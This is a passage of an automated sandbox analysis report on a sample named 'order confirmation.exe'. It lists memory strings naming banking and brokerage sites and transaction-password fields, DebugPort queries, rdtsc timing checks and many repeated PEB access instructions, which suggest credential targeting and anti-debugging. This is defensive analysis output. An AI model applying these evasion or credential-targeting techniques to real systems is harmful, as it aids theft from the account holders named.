                Source: sE716IK71M.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: sE716IK71M.9.drBinary or memory string: global block list test formVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: sE716IK71M.9.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: sE716IK71M.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: sE716IK71M.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: sE716IK71M.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: firefox.exe, 0000000C.00000002.2291269421.000002056CD8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F096E rdtsc 4_2_013F096E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00417C23 LdrLoadDll,4_2_00417C23
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01444144 mov eax, dword ptr fs:[00000030h]4_2_01444144
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01444144 mov eax, dword ptr fs:[00000030h]4_2_01444144
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01444144 mov ecx, dword ptr fs:[00000030h]4_2_01444144
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01444144 mov eax, dword ptr fs:[00000030h]4_2_01444144
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01444144 mov eax, dword ptr fs:[00000030h]4_2_01444144
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E0124 mov eax, dword ptr fs:[00000030h]4_2_013E0124
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01448158 mov eax, dword ptr fs:[00000030h]4_2_01448158
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov eax, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov ecx, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov eax, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov eax, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov ecx, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov eax, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov eax, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov ecx, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov eax, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E10E mov ecx, dword ptr fs:[00000030h]4_2_0145E10E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01470115 mov eax, dword ptr fs:[00000030h]4_2_01470115
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145A118 mov ecx, dword ptr fs:[00000030h]4_2_0145A118
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145A118 mov eax, dword ptr fs:[00000030h]4_2_0145A118
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145A118 mov eax, dword ptr fs:[00000030h]4_2_0145A118
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145A118 mov eax, dword ptr fs:[00000030h]4_2_0145A118
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AC156 mov eax, dword ptr fs:[00000030h]4_2_013AC156
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6154 mov eax, dword ptr fs:[00000030h]4_2_013B6154
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6154 mov eax, dword ptr fs:[00000030h]4_2_013B6154
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014761C3 mov eax, dword ptr fs:[00000030h]4_2_014761C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014761C3 mov eax, dword ptr fs:[00000030h]4_2_014761C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142E1D0 mov eax, dword ptr fs:[00000030h]4_2_0142E1D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142E1D0 mov eax, dword ptr fs:[00000030h]4_2_0142E1D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0142E1D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142E1D0 mov eax, dword ptr fs:[00000030h]4_2_0142E1D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142E1D0 mov eax, dword ptr fs:[00000030h]4_2_0142E1D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA197 mov eax, dword ptr fs:[00000030h]4_2_013AA197
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA197 mov eax, dword ptr fs:[00000030h]4_2_013AA197
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA197 mov eax, dword ptr fs:[00000030h]4_2_013AA197
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014861E5 mov eax, dword ptr fs:[00000030h]4_2_014861E5
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F0185 mov eax, dword ptr fs:[00000030h]4_2_013F0185
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01454180 mov eax, dword ptr fs:[00000030h]4_2_01454180
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01454180 mov eax, dword ptr fs:[00000030h]4_2_01454180
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E01F8 mov eax, dword ptr fs:[00000030h]4_2_013E01F8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146C188 mov eax, dword ptr fs:[00000030h]4_2_0146C188
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146C188 mov eax, dword ptr fs:[00000030h]4_2_0146C188
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143019F mov eax, dword ptr fs:[00000030h]4_2_0143019F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143019F mov eax, dword ptr fs:[00000030h]4_2_0143019F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143019F mov eax, dword ptr fs:[00000030h]4_2_0143019F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143019F mov eax, dword ptr fs:[00000030h]4_2_0143019F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436050 mov eax, dword ptr fs:[00000030h]4_2_01436050
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA020 mov eax, dword ptr fs:[00000030h]4_2_013AA020
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AC020 mov eax, dword ptr fs:[00000030h]4_2_013AC020
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE016 mov eax, dword ptr fs:[00000030h]4_2_013CE016
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE016 mov eax, dword ptr fs:[00000030h]4_2_013CE016
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE016 mov eax, dword ptr fs:[00000030h]4_2_013CE016
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE016 mov eax, dword ptr fs:[00000030h]4_2_013CE016
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01434000 mov ecx, dword ptr fs:[00000030h]4_2_01434000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01452000 mov eax, dword ptr fs:[00000030h]4_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DC073 mov eax, dword ptr fs:[00000030h]4_2_013DC073
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B2050 mov eax, dword ptr fs:[00000030h]4_2_013B2050
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01446030 mov eax, dword ptr fs:[00000030h]4_2_01446030
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014320DE mov eax, dword ptr fs:[00000030h]4_2_014320DE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014360E0 mov eax, dword ptr fs:[00000030h]4_2_014360E0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B208A mov eax, dword ptr fs:[00000030h]4_2_013B208A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AC0F0 mov eax, dword ptr fs:[00000030h]4_2_013AC0F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F20F0 mov ecx, dword ptr fs:[00000030h]4_2_013F20F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B80E9 mov eax, dword ptr fs:[00000030h]4_2_013B80E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA0E3 mov ecx, dword ptr fs:[00000030h]4_2_013AA0E3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014480A8 mov eax, dword ptr fs:[00000030h]4_2_014480A8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014760B8 mov eax, dword ptr fs:[00000030h]4_2_014760B8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014760B8 mov ecx, dword ptr fs:[00000030h]4_2_014760B8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147A352 mov eax, dword ptr fs:[00000030h]4_2_0147A352
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01458350 mov ecx, dword ptr fs:[00000030h]4_2_01458350
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov ecx, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AC310 mov ecx, dword ptr fs:[00000030h]4_2_013AC310
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D0310 mov ecx, dword ptr fs:[00000030h]4_2_013D0310
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA30B mov eax, dword ptr fs:[00000030h]4_2_013EA30B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA30B mov eax, dword ptr fs:[00000030h]4_2_013EA30B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA30B mov eax, dword ptr fs:[00000030h]4_2_013EA30B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145437C mov eax, dword ptr fs:[00000030h]4_2_0145437C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014363C0 mov eax, dword ptr fs:[00000030h]4_2_014363C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146C3CD mov eax, dword ptr fs:[00000030h]4_2_0146C3CD
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014543D4 mov eax, dword ptr fs:[00000030h]4_2_014543D4
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014543D4 mov eax, dword ptr fs:[00000030h]4_2_014543D4
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov eax, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov eax, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov ecx, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov eax, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A8397 mov eax, dword ptr fs:[00000030h]4_2_013A8397
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A8397 mov eax, dword ptr fs:[00000030h]4_2_013A8397
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A8397 mov eax, dword ptr fs:[00000030h]4_2_013A8397
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D438F mov eax, dword ptr fs:[00000030h]4_2_013D438F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D438F mov eax, dword ptr fs:[00000030h]4_2_013D438F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE388 mov eax, dword ptr fs:[00000030h]4_2_013AE388
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE388 mov eax, dword ptr fs:[00000030h]4_2_013AE388
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE388 mov eax, dword ptr fs:[00000030h]4_2_013AE388
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E63FF mov eax, dword ptr fs:[00000030h]4_2_013E63FF
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F0 mov eax, dword ptr fs:[00000030h]4_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F0 mov eax, dword ptr fs:[00000030h]4_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F0 mov eax, dword ptr fs:[00000030h]4_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01438243 mov eax, dword ptr fs:[00000030h]4_2_01438243
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01438243 mov ecx, dword ptr fs:[00000030h]4_2_01438243
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A823B mov eax, dword ptr fs:[00000030h]4_2_013A823B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146A250 mov eax, dword ptr fs:[00000030h]4_2_0146A250
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146A250 mov eax, dword ptr fs:[00000030h]4_2_0146A250
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A826B mov eax, dword ptr fs:[00000030h]4_2_013A826B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B4260 mov eax, dword ptr fs:[00000030h]4_2_013B4260
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B4260 mov eax, dword ptr fs:[00000030h]4_2_013B4260
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B4260 mov eax, dword ptr fs:[00000030h]4_2_013B4260
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6259 mov eax, dword ptr fs:[00000030h]4_2_013B6259
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA250 mov eax, dword ptr fs:[00000030h]4_2_013AA250
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02A0 mov eax, dword ptr fs:[00000030h]4_2_013C02A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02A0 mov eax, dword ptr fs:[00000030h]4_2_013C02A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE284 mov eax, dword ptr fs:[00000030h]4_2_013EE284
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE284 mov eax, dword ptr fs:[00000030h]4_2_013EE284
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01430283 mov eax, dword ptr fs:[00000030h]4_2_01430283
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01430283 mov eax, dword ptr fs:[00000030h]4_2_01430283
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01430283 mov eax, dword ptr fs:[00000030h]4_2_01430283
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02E1 mov eax, dword ptr fs:[00000030h]4_2_013C02E1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02E1 mov eax, dword ptr fs:[00000030h]4_2_013C02E1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02E1 mov eax, dword ptr fs:[00000030h]4_2_013C02E1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov ecx, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01446500 mov eax, dword ptr fs:[00000030h]4_2_01446500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E656A mov eax, dword ptr fs:[00000030h]4_2_013E656A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E656A mov eax, dword ptr fs:[00000030h]4_2_013E656A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E656A mov eax, dword ptr fs:[00000030h]4_2_013E656A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8550 mov eax, dword ptr fs:[00000030h]4_2_013B8550
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8550 mov eax, dword ptr fs:[00000030h]4_2_013B8550
